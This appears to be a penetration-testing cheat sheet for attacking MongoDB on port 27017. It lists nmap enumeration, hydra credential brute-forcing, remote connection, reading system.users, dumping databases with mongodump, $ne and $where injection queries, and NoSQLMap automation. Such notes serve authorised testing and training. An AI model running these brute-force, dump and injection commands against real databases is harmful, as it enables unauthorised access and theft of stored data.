MongoDB 27017
1. Nmap Scans for MongoDB
nmap --script mongodb-info -p 27017 <target-ip>
For database enumeration:
nmap --script mongodb-databases -p 27017 <target-ip>
2. Brute Forcing Credentials
Single username, password list:
hydra -l username -P passwords.txt <target-ip> mongodb
Username list, single password:
hydra -L usernames.txt -p password <target-ip> mongodb
3. Connecting to MongoDB
Local Connection:
mongo
mongo --port 27017
Remote Connection:
mongo --host <target-ip> --port 27017
For authenticated access:
mongo "mongodb://username:password@<target-ip>:27017/?authSource=admin"
4. Basic Commands
List all databases:
show dbs
Switch database or create if it doesn’t exist:
use <db_name>
List collections in the current database:
show collections
List all users in the current database:
show users
View database users:
db.system.users.find()
Run a JavaScript file:
load("example.js")
5. Data Retrieval Using Queries
Find all documents in a collection:
db.<collection_name>.find()
Find one document matching a condition:
db.<collection_name>.findOne({username: "admin"})
Operators:
$eq
: Equaldb.<collection_name>.findOne({username: {"$eq": "admin"}})
$ne
: Not equaldb.<collection_name>.findOne({password: {"$ne": "xyz"}})
$gt
: Greater thandb.<collection_name>.findOne({id: {"$gt": "2"}})
6. Exploitation Techniques
Unsecured Instances:
Unauthenticated MongoDB instances allow direct access. Simply connect using:
mongo <target-ip>:27017
Dump all databases:
show dbs db.<db_name>.find()
Export data using
mongodump
:mongodump --host <target-ip> --port 27017 --out <output-dir>
Weak Credentials:
If credentials are identified (e.g., via brute force), authenticate and escalate data access.
No Authorization Restrictions:
Misconfigured MongoDB can allow creation or modification of collections:
db.createCollection("new_collection") db.new_collection.insert({"key": "value"})
Script Injection via
$where
:Execute JavaScript within queries:
db.<collection_name>.find({$where: "this.username == 'admin'"})
7. Automation with Scripts
You can automate enumeration and exploitation using custom scripts or tools:
Python automation script:
sudo git clone https://github.com/kozmic/NoSQLMap.git cd NoSQLMap python nosqlmap.py
Last updated